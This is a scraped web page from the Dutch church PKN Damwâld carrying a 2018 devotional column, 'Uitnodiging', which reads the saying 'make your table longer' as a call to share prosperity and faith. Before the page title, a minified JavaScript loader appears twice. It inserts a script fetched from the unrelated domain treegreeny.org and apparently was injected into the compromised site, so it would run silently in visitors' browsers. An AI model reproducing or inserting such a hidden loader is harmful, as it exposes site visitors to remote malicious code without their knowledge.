;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Uitnodiging - PKN Damwâld

Uitnodiging

Gepubliceerd op: vrijdag 9 november 2018

Soms lees je zin, een regel, een woord dat je langere tijd vasthoudt, waar je regelmatig aan terugdenkt omdat je het op de een of andere manier heeft geraakt, het heeft je iets gedaan.
Zo las ik bij een kerkgebouw in het buitenland de regel: ‘Als het je in jouw leven meezit, het gaat je voor de wind, bouw dan niet een schutting om je leven maar maak je tafel langer’.
Bij het lezen en herlezen van deze regel dacht ik dat hij zowel letterlijk als figuurlijk kan worden opgevat.
Letterlijk, als jij het in je leven goed hebt houd dan niet alles voor je zelf. Bouw niet een nog hogere en sterkere schutting om je heen maar maak je tafel langer, m.a.w. laat mensen delen in jouw voorspoed. Een duidelijk uitnodiging om oog te hebben voor de materiële noden in onze wereld.
Figuurlijk kun je dit ook uitleggen: Als jij in je leven van God hebt gehoord en Hem hebt lief gekregen en Hem bent gaan dienen houd dat dan niet voor jezelf maar laat anderen delen in jouw geloof en in de vreugde die jou dit geeft. Heb ook oog voor de geestelijke leegte en de geestelijke nood die er in de wereld is. Maak je tafel langer, vertel aan de mensen op Wie jij in je leven vertrouwt en zorg er daarbij voor dat niet menselijke regeltjes een ‘sta-in-de-weg’ worden.
Zelf dacht ik nog: Soms zijn wij bang om de tafel langer te maken want dan kunnen wij niet meer overzien wat er aan het andere einde van de tafel precies gebeurt en hebben we daar geen of naar onze mening te weinig invloed meer op.
Maak je tafel gerust wat langer, God zal aan beide kanten (uiteinden) van de tafel Zijn mensen behoeden.

 

Fotoverantwoording: https://nl.freepik.com/vrije-foto-vectoren/achtergrond”>Achtergrond foto designed by Kues1 – Freepik.com

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns